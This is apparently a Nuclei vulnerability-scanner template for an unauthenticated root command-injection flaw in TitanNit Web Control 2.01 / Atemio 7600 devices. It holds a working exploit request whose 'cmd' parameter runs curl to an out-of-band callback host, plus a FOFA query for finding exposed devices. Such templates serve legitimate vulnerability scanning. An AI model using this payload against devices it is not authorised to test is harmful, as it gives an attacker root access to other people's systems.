id: titannit-web-rce

info:
  name: TitanNit Web Control 2.01/Atemio 7600 Root - Remote Code Execution
  author: DhiyaneshDk
  severity: high
  description: |
    The vulnerability in the device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application,allowing the attacker to gain root access.
  reference:
    - https://www.exploit-db.com/exploits/51853
    - https://github.com/projectdiscovery/nuclei-templates/issues/8716
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="TitanNit Web Control"
  tags: titanit,web-control,oast,rce

http:
  - raw:
      - |
        @timeout: 20s
        GET /query?getcommand=&cmd=curl+http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "titan.css"
# digest: 4a0a0047304502204924c878a5a761c1445ca81b66143ef9dc59bee364ee1c721712f16e3c4fc6d80221008fa2593dc7557f42af384a29e3b87cab735bd2cb14cc635787fe6809aef33640:922c64590222798bb761d5b6d8e72950